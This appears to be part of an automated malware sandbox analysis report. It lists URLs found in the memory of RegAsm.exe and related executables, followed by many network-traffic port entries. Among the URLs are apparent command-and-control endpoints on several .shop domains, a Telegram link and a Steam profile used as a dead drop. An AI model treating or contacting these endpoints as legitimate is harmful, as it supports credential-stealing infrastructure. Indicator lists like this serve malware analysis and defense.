Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop/apir
Source: RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop/pi
Source: RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop/~
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/
Source: RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop//
Source: RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/api
Source: RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/l
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.co2
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199780418869[1].htm.13.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/&1
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.13.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 00000009.00000002.2414973585.00000000015D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, KJEHJKJEBG.exe, 0000000A.00000002.2348801084.0000000003B6B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869&
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: file.exe, 00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJEHJKJEBG.exe, 0000000A.00000002.2348801084.0000000003B6B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/w
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop/
Source: RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop/api
Source: 76561199780418869[1].htm.13.dr	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199780418869[1].htm.13.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privac
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: HDGDGH.3.dr	String found in binary or memory: https://support.mozilla.org
Source: HDGDGH.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HDGDGH.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2393077836.0000000019C9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2710265269.0000000019E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.0000000001341000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, GHDBKJ.13.dr, KFIJEG.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: GHDBKJ.13.dr, KFIJEG.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2393077836.0000000019C9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2710265269.0000000019E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.0000000001341000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, GHDBKJ.13.dr, KFIJEG.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: GHDBKJ.13.dr, KFIJEG.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, 00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJEHJKJEBG.exe, 0000000A.00000002.2348801084.0000000003B6B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vozmeatillu.shop/
Source: RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vozmeatillu.shop/$
Source: RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vozmeatillu.shop/api
Source: RegAsm.exe, 00000003.00000002.2384321664.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp, EBAFBG.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: IEHJJE.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 00000003.00000002.2384321664.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp, EBAFBG.3.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: IEHJJE.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: HDGDGH.3.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000003.00000002.2393077836.0000000019C9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HDGDGH.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000003.00000002.2393077836.0000000019C9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HDGDGH.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000003.00000002.2393077836.0000000019C9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: HDGDGH.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HDGDGH.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.2393077836.0000000019C9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: HDGDGH.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
